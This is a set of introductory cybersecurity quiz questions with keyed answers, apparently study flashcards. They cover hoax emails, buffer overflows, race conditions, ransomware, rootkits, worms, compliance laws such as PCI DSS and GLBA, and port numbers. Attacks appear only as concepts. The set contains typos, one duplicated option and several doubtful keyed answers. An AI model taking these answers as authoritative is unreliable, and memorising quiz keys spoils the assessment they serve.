
All employees in an organization receive an email stating that their account password will expire immediately and that they should reset their password within five minutes. Which of the following statements best describes this email? It is a piggyback attack It is an impersonation attack It is a hoax It is a DDoS attack

It is a hoax

Which statement describes cybersecurity? It is a framework for security policy development. It is a standard-based model for developing firewall technologies to fight against cybercriminals. It is a standard-based model for developing firewall technologies to fight against cybercriminals. It is an ongoing effort to protect Internet-connected systems and the data associated with those systems from unauthorized use or harm.

It is an ongoing effort to protect Internet-connected systems and the data associated with those systems from unauthorized use or harm.

A penetration testing service hired by the company has reported that a backdoor was identified on the network. What action should the organization take to find out if systems have been compromised? Look for policy changes in Event Viewer. Scan the systems for viruses. Look for unauthorized accounts. Look for usernames that do not have passwords.

Look for unauthorized accounts.

Why do IoT devices pose a greater risk than other computing devices on a network? IoT devices require unencrypted wireless connections. IoT devices cannot function on an isolated network with only an Internet connection. Most IoT devices do not require an Internet connection and are unable to receive new updates. Most IoT devices do not receive frequent firmware updates.

Most IoT devices do not receive frequent firmware updates.

Your neighbor tells you that they don't have an online identity. They have no social media accounts and only use the Internet to browse. Is your neighbor right? Yes No

No

'Data coming into a program should be sanitized, as it could have malicious content, designed to force the program to behave in an unintended way.' This statement describes what security vulnerability? Weaknesses in security practices Access control problems Buffer overflow Non-validated input Race conditions

Non-validated input

Which of the following security vulnerabilities could result in the receipt of malicious information that could force a program to behave in an unintended way? Buffer overflow Non-validated input Race condition Access control problem

Non-validated input

Can you identify the software vulnerability from the following descriptions? Occurs when data is written beyond the limits of memory areas that are allocated to an application Occurs when an ordered or timed set of processes is disrupted or altered by an exploit Occurs through the improper use of practices that manage equipment, data or applications-

Occurs when data is written beyond the limits of memory areas that are allocated to an application- Buffer overflow Occurs when an ordered or timed set of processes is disrupted or altered by an exploit- Race condition Occurs through the improper use of practices that manage equipment, data or applications- Access control

Which technology creates a security token that allows a user to log in to a desired web application using credentials from a social media website? Open authorization VPN service Password manager In-private browsing mode3

Open authorization

How can you keep your personal browsing history hidden from other users on a shared computer? Use only an encrypted connection to access websites Operate the web browser in private browser mode Move any downloaded files to the recycle bin Reboot the computer after closing the web browser

Operate the web browser in private browser mode

Which industry-specific law governs payment card data protection? GLBA SOX ECPA PCI DSS

PCI DSS

what is not a U.S. compliance act? CIPA FERPA FISM HIPAA PCI DSS

PCI DSS

What vulnerability occurs when the output of an event depends on ordered or timed outputs? Weaknesses in security practices Non-validated input Race conditions Buffer overflow Access control problems

Race conditions

Employees in an organization report that they cannot access the customer database on the main server. Further investigation reveals that the database file is now encrypted. Shortly afterward, the organization receives a threatening email demanding payment for the decryption of the database file. What type of attack has the organization experienced? DoS attack Trojan horse Man-in-the-middle attack Ransomware

Ransomware

What three best practices can help defend against social engineering attacks? (Choose three.) Enable a policy that states that the IT department should supply information over the phone only to managers. Add more security guards. Resist the urge to click on enticing web links. Deploy well-designed firewall appliances. Educate employees regarding policies. Do not provide password resets in a chat window.

Resist the urge to click on enticing web links. Educate employees regarding policies. Do not provide password resets in a chat window.

Which formula is typically used to describe the components of information security risks? Risk = Likelihood X Vulnerability Risk = Threat X Vulnerability Risk = Threat X Likelihood Risk = Vulnerability X Cost

Risk = Threat X Vulnerability

Earl is preparing a risk register for his organization's risk management program. Which data element is LEAST likely to be included in a risk register? Description of the risk Expected impact Risk survey results Mitigation steps

Risk survey results

Which VPN technology is currently considered the preferred method for securely connecting a remote endpoint device back to an enterprise network? point-to-point tunneling protocol (PPTP) secure socket tunneling protocol (SSTP) Secure Sockets Layer (SSL) Internet Protocol Security (IPsec)

Secure Sockets Layer (SSL)

A consumer would like to print photographs stored on a cloud storage account using a third party online printing service. After successfully logging into the cloud account, the customer is automatically given access to the third party online printing service. What allowed this automatic authentication to occur? The user is on an unencrypted network and the password for the cloud storage service is viewable by the online printing service. The cloud storage service is an approved application for the online printing service. The password entered by the user for the online printing service is the same as the password used on the cloud storage service. The account information for the cloud storage service was intercepted by a malicious application.

The cloud storage service is an approved application for the online printing service.

Which of the following is the definition of hardened configuration? A method of security testing that isn’t based directly on knowledge of a program's architecture. Using tools to determine the layout and services running on an organization's systems and networks. The state of a computer or device in which you have turned off or disabled unnecessary services and protected the ones that are still running. Incorrectly identifying abnormal activity as normal.

The state of a computer or device in which you have turned off or disabled unnecessary services and protected the ones that are still running.

What is the main purpose of cyberwarfare? to protect cloud-based data centers to gain advantage over adversaries to develop advanced network devices to simulate possible war scenarios among nations

to gain advantage over adversaries

What is the purpose of a rootkit? to replicate itself independently of any other programs to gain privileged access to a device while concealing itself to deliver advertisements without user consent to masquerade as a legitimate program

to gain privileged access to a device while concealing itself

What is the primary goal of a DoS attack? to facilitate access to external networks to prevent the target server from being able to handle additional requests to obtain all addresses in the address book within the server to scan the data on the target server

to prevent the target server from being able to handle additional requests

Which two characteristics describe a worm? (Choose two.) hides in a dormant state until needed by an attacker executes when software is run on a computer travels to new computers without any intervention or knowledge of the user infects computers by attaching to software code is self-replicating

travels to new computers without any intervention or knowledge of the user is self-replicating

Which technology is a means of managing and presenting computer resources by function without regard to their physical layout or location? IaaS cloud computing virtualization PaaS

virtualization

Which technique is not used to break the command-and control (C&C) phase of the Cyber-Attack Lifecycle? blocking outbound traffic to known malicious sites and IP addresses DNS sinkholing and DNS poisoning vulnerability and patch management all of the above

vulnerability and patch management

An administrator needs to examine FTP commands that are being passed to a server. What port should the administrator be monitoring? 19 20 21 22

21

What is an example of "hacktivism"? A group of environmentalists launch a denial of service attack against an oil company that is responsible for a large oil spill. A teenager breaks into the web server of a local newspaper and posts a picture of a favorite cartoon character. A country tries to steal defense secrets from another country by infiltrating government networks. Criminals use the Internet to attempt to steal money from a banking company.

A group of environmentalists launch a denial of service attack against an oil company that is responsible for a large oil spill.

Improper management of physical access to a resource, such as a file, can lead to what type of security vulnerability? Weaknesses in security practices Race conditions Access control problems Buffer overflow Non-validated input

Access control problems

What do you call a program written to take advantage of a known security vulnerability? An exploit Antivirus A firewall A software update

An exploit

What name is given to a device that controls or filters traffic going in or out of the network? Router VPN Firewall IPS

FIrewall

Which of the following security implementations use biometrics? (Choose two correct answers) Fingerprint Phone Credit card Voice recognition Fob

Fingerprint Voice recognition

What law protects the privacy of an employee's personal information from being shared with third parties? SOX GLBA PCI DSS FIRPA

GLBA

Select which answer does NOT apply to the Payment Card Industry Data Security Standard (PCI-DSS) : Protects cardholder data Stipulates penalties for violations Applies to the Retail industry Government Regulation

Government Regulation

Which law requires banks and financial institutions to alert customers of their policies and practices in disclosing customer information? Gramm-Leach-Bliley Sarbanes-Oxley California Database Security Breach USA Patriot

Gramm-Leach-Bliley

Which of the following methods is used to check the integrity of data? Backup Hashes or checksums Encryption Authentication

Hashes or checksums

What are the two most effective ways to defend against malware? (Choose two.) Implement network firewalls. Install and update antivirus software. Implement RAID. Update the operating system and other application software. Implement strong passwords. Implement a VPN.

Install and update antivirus software. Update the operating system and other application software.

What is the best way to avoid getting spyware on a machine? Install the latest antivirus updates Install the latest web browser updates Install software only from trusted websites Install the latest operating system updates

Install software only from trusted websites

What should you do in order to make sure that people you live with do not have access to your secure data? Turn on a firewall Increase the privacy settings on your browser Install antivirus software Set up password protection

Set up password protection

What non-technical method could a cybercriminal use to gather sensitive information from an organization? Pharming Man-in-the-middle Social engineering Ransomware

Social engineering

Which of the following pieces of information would be classified as personal data? (Select three correct answers) Social security number Driver license number Date and place of birth Job title IP address

Social security number Driver license number Date and place of birth

Which of the following items are states of data? (Choose three correct answers) Storage Text ASCII Transmission Binary Processing

Storage Transmission Processing

What is the correct definition of risk management? The process of transferring risks that cannot be eliminated or mitigated The process of identifying and assessing risk to determine the severity of threats The process of accepting risks that cannot be eliminated, mitigated or transferred The process of identifying and assessing risk to reduce the impact of threats and vulnerabilities

The process of identifying and assessing risk to reduce the impact of threats and vulnerabilities

_____ ensures that only authorized parties can view the information. a. Availability b. Integrity c. Confidentiality d. ICA

c. Confidentiality

What name is given to the emerging threat that hides on a computer or mobile device and uses that machine's resources to mine cryptocurrencies? Phishing Bluejacking Cryptoransomware Cryptojacking

Cryptojacking

Each of the following can be classified as an "insider" except _______. a. business partners b. contractors c. cybercriminals d. employees

Cybercriminals

What key component of virtualization allows you to run multiple independent operating systems on one physical system? A container A hypervisor A VDI

A hypervisor

Bob is using a port scanner to identify open ports on a server in his environment. He is scanning a web server that uses Hypertext Transfer Protocol (HTTP). Which port should Bob expect to be open to support this service? A. 21 B. 23 C. 80 D. 443

C. 80

What do you call a digital asset designed to work as a medium of exchange that uses strong encryption to secure a financial transaction? Apple Pay Google Pay Near Field Communications Cryptocurrency

Cryptocurrency

what type of function generates the unique value that corresponds to the contents of a message and is used to create a digital signature? A. RSA B. Decryption C. Encryption D. Hash

D. Hash

What design principles help to ensure high availability? (Select three answers) Using encryption Ensuring confidentiality Eliminating single points of failure Providing for reliable crossover Detecting failures as they occur Checking for data consistency

Eliminating single points of failure Providing for reliable crossover Detecting failures as they occur